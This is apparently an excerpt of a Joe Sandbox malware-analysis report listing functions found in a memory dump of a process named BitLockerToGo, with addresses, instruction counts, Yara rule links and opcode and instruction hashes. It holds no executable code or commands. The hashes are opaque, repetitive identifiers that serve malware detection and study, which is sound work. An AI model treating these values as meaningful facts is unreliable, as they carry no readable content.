                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 5dbd38d1cd0afa049c59299c512227dd0e4829d44e67eec8c01895143fcd5354
                                                                                                                                                                  • Instruction ID: 7a0f74a9eed560757c8321c2a6c9d3c21f04d02c911830f0d87bc4083b36c180
                                                                                                                                                                  • Opcode Fuzzy Hash: 5dbd38d1cd0afa049c59299c512227dd0e4829d44e67eec8c01895143fcd5354
                                                                                                                                                                  • Instruction Fuzzy Hash: 10320170515B108FC36ACE29C5D062AFBF2FF85610B544AAED6A787E90D736F984CB10
                                                                                                                                                                  Function 02B28554 Relevance: .5, Instructions: 468COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8406177565872b05c551bd0a7148b611379e9d691ea49b8d1e31731791fc06be
                                                                                                                                                                  • Instruction ID: 8941598e6f989c2a99fe255bc0f3256a9c3022112286756b7ec9739924367464
                                                                                                                                                                  • Opcode Fuzzy Hash: 8406177565872b05c551bd0a7148b611379e9d691ea49b8d1e31731791fc06be
                                                                                                                                                                  • Instruction Fuzzy Hash: 05028F75E11226CFDB04CF68D8907AEB7B6FF49340F5944A8D906EB280DB34AD64CB60
                                                                                                                                                                  Function 02B0A4D0 Relevance: .5, Instructions: 459COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1469a84143a3a11512b1f805f0116d3a1739d52b7f671e4518f4cdee2cd1b1ae
                                                                                                                                                                  • Instruction ID: 112f2455da686d9b09129b272b358ea45fc6f8641cc932b6cecb561c2697cb79
                                                                                                                                                                  • Opcode Fuzzy Hash: 1469a84143a3a11512b1f805f0116d3a1739d52b7f671e4518f4cdee2cd1b1ae
                                                                                                                                                                  • Instruction Fuzzy Hash: BFF1AA756083418FC725CF29C88176ABBE2BFD8204F088C6DE6D587791E639E844CB92
                                                                                                                                                                  Function 02B4826A Relevance: .4, Instructions: 369COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 40f71d56e0f59557bae67b6999ab8a823d29f65c3ec434931a17c7d4da143fe8
                                                                                                                                                                  • Instruction ID: 6384bb6b955e3918d82de73300445380132f24bdaf07fcdca5bec22ab8a9d25d
                                                                                                                                                                  • Opcode Fuzzy Hash: 40f71d56e0f59557bae67b6999ab8a823d29f65c3ec434931a17c7d4da143fe8
                                                                                                                                                                  • Instruction Fuzzy Hash: 5DD1F436A18360CFC720CF38E49032AB7E2FB89355F4989ADE8959B386D734D954CB41
                                                                                                                                                                  Function 02B2CA40 Relevance: .4, Instructions: 368COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 12aa60642de5fc65f2b57284a4aa350fbc2d7852d5b2b38c92231f1365e98d19
                                                                                                                                                                  • Instruction ID: 233146075837294435301f921a03a18820033cb47bb74038278e000c7bcc01a6
                                                                                                                                                                  • Opcode Fuzzy Hash: 12aa60642de5fc65f2b57284a4aa350fbc2d7852d5b2b38c92231f1365e98d19
                                                                                                                                                                  • Instruction Fuzzy Hash: FCB1F0706083518BD710EF28D88072FBBE6EF95354F1549AEE5C98B291E731E848CBD2
                                                                                                                                                                  Function 02B49290 Relevance: .3, Instructions: 344COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 30ab4e57a69694b9d061e011b7e604433ae9fc250293ed6b73b41297cee39d22
                                                                                                                                                                  • Instruction ID: ed3af1e8f0a9ba4d20b3b4ca77823bf90059d9f8353565e9e812c9e47a43aa95
                                                                                                                                                                  • Opcode Fuzzy Hash: 30ab4e57a69694b9d061e011b7e604433ae9fc250293ed6b73b41297cee39d22
                                                                                                                                                                  • Instruction Fuzzy Hash: F2B10672A047908FD7249E28DCC476BB7E6EBC5318F0849ADE9959B341EF31DD048B92
                                                                                                                                                                  Function 02B2E58F Relevance: .3, Instructions: 338COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: d9ce468cc6c6c4a2f12a124af71e24b2aa256dc24688184d4a31c6521d91c3ec
                                                                                                                                                                  • Instruction ID: 11200f20ef66ba1d1127c76144984a73f77307fd1fbdf4680244a649f0e3deea
                                                                                                                                                                  • Opcode Fuzzy Hash: d9ce468cc6c6c4a2f12a124af71e24b2aa256dc24688184d4a31c6521d91c3ec
                                                                                                                                                                  • Instruction Fuzzy Hash: 3FA10931A483A1CFD3108F39D85132ABBE2AFC6350F198AADE5A44B3E1D735E955CB41
                                                                                                                                                                  Function 02B0B0B0 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 62d4138942f3f3cea88588d0f94ce375e157f31f215404b2ca1d482948d77090
                                                                                                                                                                  • Instruction ID: f0d50ad2b991ff0730191ec6c18e27df6acc1570bcf88324312039cc591e1c8f
                                                                                                                                                                  • Opcode Fuzzy Hash: 62d4138942f3f3cea88588d0f94ce375e157f31f215404b2ca1d482948d77090
                                                                                                                                                                  • Instruction Fuzzy Hash: A9C16BB29487418FC321CF28CC96BABBBE1FF85318F08496DD1D9C6242E778A155CB46
                                                                                                                                                                  Function 02B2EAE4 Relevance: .3, Instructions: 299COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 7594369a02c69204c2b17fb7b34bf751fdda91ea64df35843d12b2ed92089974
                                                                                                                                                                  • Instruction ID: d46651b044329a4c96c1fa3c79406f2af99a14951eb20ed06237394da2eb54c2
                                                                                                                                                                  • Opcode Fuzzy Hash: 7594369a02c69204c2b17fb7b34bf751fdda91ea64df35843d12b2ed92089974
                                                                                                                                                                  • Instruction Fuzzy Hash: FE81BDB89003268BCB25CF95C891BBAB7B1FF45354F181589E845BB390EB34E911CB66
                                                                                                                                                                  Function 02B4B910 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 03395d2db5fa742ccf8eec297586d151694b41f389fca39610038f7417b83376
                                                                                                                                                                  • Instruction ID: 83143b4e6f859c46a98664e70b179a03eb69854a05f7fbceea067c936d862eae
                                                                                                                                                                  • Opcode Fuzzy Hash: 03395d2db5fa742ccf8eec297586d151694b41f389fca39610038f7417b83376
                                                                                                                                                                  • Instruction Fuzzy Hash: 5781B034A093019BC724DF28C8D0A2BB7F5FF49748F4589ACE686CB251EB31E810DB52
                                                                                                                                                                  Function 02B48736 Relevance: .3, Instructions: 253COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6d932c850468dd1775ff8d288e4419674d6799bb7a70eafd34877621838e77c4
                                                                                                                                                                  • Instruction ID: 38d1f7d8103092aa97f4dd9e64c9545d7e9b0b856bb64a366e91813d72b84f5b
                                                                                                                                                                  • Opcode Fuzzy Hash: 6d932c850468dd1775ff8d288e4419674d6799bb7a70eafd34877621838e77c4
                                                                                                                                                                  • Instruction Fuzzy Hash: 86810336A58360CFC314DF28E89072AB3E2FB89355F498E6DD4959B381D735E960CB41
                                                                                                                                                                  Function 02B05E60 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 5f51f1f8993b9762d00fd05b0aeedf6d5a23f0882ca8609cc6db4992c8fa906d
                                                                                                                                                                  • Instruction ID: 2c0e9245823210e847f6366756e309debaa929b71b83a32a737911e40613f186
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f51f1f8993b9762d00fd05b0aeedf6d5a23f0882ca8609cc6db4992c8fa906d
                                                                                                                                                                  • Instruction Fuzzy Hash: C471A1B09007019FD3159F28DCA9716BBA5FF44328F584B3CE8AA9B2E0D735D564CB86
                                                                                                                                                                  Function 02B01B25 Relevance: .2, Instructions: 211COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 43e41a23fe8b40a5d8fc8b149f8959eb78d1edeae2fd24caeef6e8fb3725f0d3
                                                                                                                                                                  • Instruction ID: f243a5e7a0fce7390cba00967484a12e90aefd809454ea71cc22a50c09eadcb7
                                                                                                                                                                  • Opcode Fuzzy Hash: 43e41a23fe8b40a5d8fc8b149f8959eb78d1edeae2fd24caeef6e8fb3725f0d3
                                                                                                                                                                  • Instruction Fuzzy Hash: C5719D719083818BD71ACE24C4D436ABFE1EFC5208F188A9DECD5973A1E775D949CB82
                                                                                                                                                                  Function 02B09E3C Relevance: .2, Instructions: 210COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: eaa7783e482984cf2a2d2d9816f0f585376b658d27fa0c0224356b07d2b92f3c
                                                                                                                                                                  • Instruction ID: 93d03e85650b04f57d118bc2d08207bfd7e2a63dd69a38c620cad788f8f9aa27
                                                                                                                                                                  • Opcode Fuzzy Hash: eaa7783e482984cf2a2d2d9816f0f585376b658d27fa0c0224356b07d2b92f3c
                                                                                                                                                                  • Instruction Fuzzy Hash: 8A81373160D390DFC755DF688480A9FBBE2ABDA740F444DADF6C58B292C231D954CB62
                                                                                                                                                                  Function 02B39070 Relevance: .2, Instructions: 208COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 62fe7ec5d88505314817605fc86363c63225a433c27eaf2b22e49a9e8e68bf45
                                                                                                                                                                  • Instruction ID: 7b3d5a63f1a10ff9cc4773803b6e380f181c72da0ee904c8d87ca3d8c7a6316b
                                                                                                                                                                  • Opcode Fuzzy Hash: 62fe7ec5d88505314817605fc86363c63225a433c27eaf2b22e49a9e8e68bf45
                                                                                                                                                                  • Instruction Fuzzy Hash: A0513637A5DD9147D32A493C4CA13B67A836FD2274F1C87EDE5F2873D5D5A54801C241
                                                                                                                                                                  Function 02B2E37B Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: d263c8c54875baf2d54e187f1ea3940073421ad8dfd524efeccf023514bcd682
                                                                                                                                                                  • Instruction ID: 87f880382a28dade2c3921afb9e2287dff6346f000ccaf2e481a5ce8626a022d
                                                                                                                                                                  • Opcode Fuzzy Hash: d263c8c54875baf2d54e187f1ea3940073421ad8dfd524efeccf023514bcd682
                                                                                                                                                                  • Instruction Fuzzy Hash: 4C510772A14B284BD7298E2D985023EB6D2ABC8205F5D867DDD6A8B385DF30EC15C781
                                                                                                                                                                  Function 02B45DB0 Relevance: .2, Instructions: 203COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: de2d8b1e0e8865d3cbae15947602986c7bfe43a58d42e0f88dcbf7602cc93485
                                                                                                                                                                  • Instruction ID: 7f51683b8b55f7de445541035d3944bcdb0706274b1cbea8b1a074dae5bb366f
                                                                                                                                                                  • Opcode Fuzzy Hash: de2d8b1e0e8865d3cbae15947602986c7bfe43a58d42e0f88dcbf7602cc93485
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D61F370608741AFD720DF14C8C0B2AFBE6EBA5304F988A9CF4D587291DB31E855EB52
                                                                                                                                                                  Function 02B13682 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: d094eb9e1d38cebabb4aed687d7cb66f5caf13198e2ce5753c6a7df1f5c7d756
                                                                                                                                                                  • Instruction ID: 6753db6215fa24fbff5027178330245435e6ebe8dec7c965364cd48675a65bb7
                                                                                                                                                                  • Opcode Fuzzy Hash: d094eb9e1d38cebabb4aed687d7cb66f5caf13198e2ce5753c6a7df1f5c7d756
                                                                                                                                                                  • Instruction Fuzzy Hash: FE6168B8610B408BD3259F24D994B27BBF6EF06705F44889CE8AB97792E735F810CB11
                                                                                                                                                                  Function 02B3F910 Relevance: .2, Instructions: 189COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8f1aa122ec59ae13e69cee9ce52d496232663b62829beb9f0467de8dcafb9024
                                                                                                                                                                  • Instruction ID: 7b36b44eee469a6cb8529893afe0f3d11c78a7f8c449a80975686a603487b0a1
                                                                                                                                                                  • Opcode Fuzzy Hash: 8f1aa122ec59ae13e69cee9ce52d496232663b62829beb9f0467de8dcafb9024
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F515BB5A087548FE314DF69D49436BBBE1FB88318F044A2DE5E987750E379D6088F82
                                                                                                                                                                  Function 02B0E530 Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1d3e74df1d9cd1d38ed6644bed65d601b0d22d3882713c9fe0f405c36b2ee021
                                                                                                                                                                  • Instruction ID: 42fef4f47b91fe5592038a10d0e7d79a71d4b8cb33a0e3a084ea0f7aa95d0b5a
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d3e74df1d9cd1d38ed6644bed65d601b0d22d3882713c9fe0f405c36b2ee021
                                                                                                                                                                  • Instruction Fuzzy Hash: 08513637B5959087D72A883C6CD236A7EC35FD2178B2CCFAAE1F18B3E2D655C8018241
                                                                                                                                                                  Function 02B44B40 Relevance: .2, Instructions: 178COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 59cbd4c09ec444bcdd055f21d9ddbced6e1c4a3fe468401dfdfd361e40feeb43
                                                                                                                                                                  • Instruction ID: 0b29671aedf25d1cfcddcf10e3eaf5bf2248f7695db23a340d313af9fb8aa933
                                                                                                                                                                  • Opcode Fuzzy Hash: 59cbd4c09ec444bcdd055f21d9ddbced6e1c4a3fe468401dfdfd361e40feeb43
                                                                                                                                                                  • Instruction Fuzzy Hash: 1E51A2346092009BE724DF19D9C4B2BBBF6EF85748F188C9CE4C597252DB31D924EB62
                                                                                                                                                                  Function 02B289F0 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b2cd5410bee842ef10438d3b2e846c3d057f33c0bed90bebd1e040e241a32ba8
                                                                                                                                                                  • Instruction ID: bda4dda3fd3a71445eebce019c56435e5bb134471dc3b813c298b676099614a8
                                                                                                                                                                  • Opcode Fuzzy Hash: b2cd5410bee842ef10438d3b2e846c3d057f33c0bed90bebd1e040e241a32ba8
                                                                                                                                                                  • Instruction Fuzzy Hash: D351C275E01226CBEB18CF68D85077E77B2FF48340F5948A8D946AB380CB34AD60CB60
                                                                                                                                                                  Function 02B289D2 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b0ec066906cdaa06803bf26a897d044085dd5c8f646c5bd58b47faee58e9c97e
                                                                                                                                                                  • Instruction ID: 63d7ff185642eb1ad10b27b04245e7d1d22d99ced4599db52b37af4537d9f0ca
                                                                                                                                                                  • Opcode Fuzzy Hash: b0ec066906cdaa06803bf26a897d044085dd5c8f646c5bd58b47faee58e9c97e
                                                                                                                                                                  • Instruction Fuzzy Hash: 6851B375E05226CBEB18CF68D85177E77B2FF48350F5948A8D946AB380DB34AD60CB60
                                                                                                                                                                  Function 02B05BB0 Relevance: .2, Instructions: 163COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b7a19685cdd209c39292c07e9a6096000d98f28cd96715c100d849a1d98fac85
                                                                                                                                                                  • Instruction ID: bbdf97345706262ac05e3e29f5c84964b6712c5e4be56ae01db122717d090dc9
                                                                                                                                                                  • Opcode Fuzzy Hash: b7a19685cdd209c39292c07e9a6096000d98f28cd96715c100d849a1d98fac85
                                                                                                                                                                  • Instruction Fuzzy Hash: 735181759042009FC725DF18C4C4926BFA1FF85324F554AADE8999B391DB31EC41CF92
                                                                                                                                                                  Function 02B1E320 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 7e0423eb16a60cd4d05676df9d9e8167669aefa54898d4bfebcf2efada99cc11
                                                                                                                                                                  • Instruction ID: 3ca2f74def4802fc16d8e0a063d4f4332b27f52eee90f4299401589fe8371877
                                                                                                                                                                  • Opcode Fuzzy Hash: 7e0423eb16a60cd4d05676df9d9e8167669aefa54898d4bfebcf2efada99cc11
                                                                                                                                                                  • Instruction Fuzzy Hash: BB41F4745083149FD3209F18D885BAB77F8EF8A794F440958F9888B390E775D950CBA2
                                                                                                                                                                  Function 02B06EB0 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1b92ea94d43b44a54c212b39420eefd61592595bc187218b5f253289c6dc1c85
                                                                                                                                                                  • Instruction ID: e7322f077b3558e6f14e3a2acae6c9bf30fdb6eeca51b4d3d4d9d44a54958d4c
                                                                                                                                                                  • Opcode Fuzzy Hash: 1b92ea94d43b44a54c212b39420eefd61592595bc187218b5f253289c6dc1c85
                                                                                                                                                                  • Instruction Fuzzy Hash: B941E232B081654BCB158A6DCD902BEFBD79FC4244F1D867AE885CB386E938E91097C0
                                                                                                                                                                  Function 02B01AE5 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
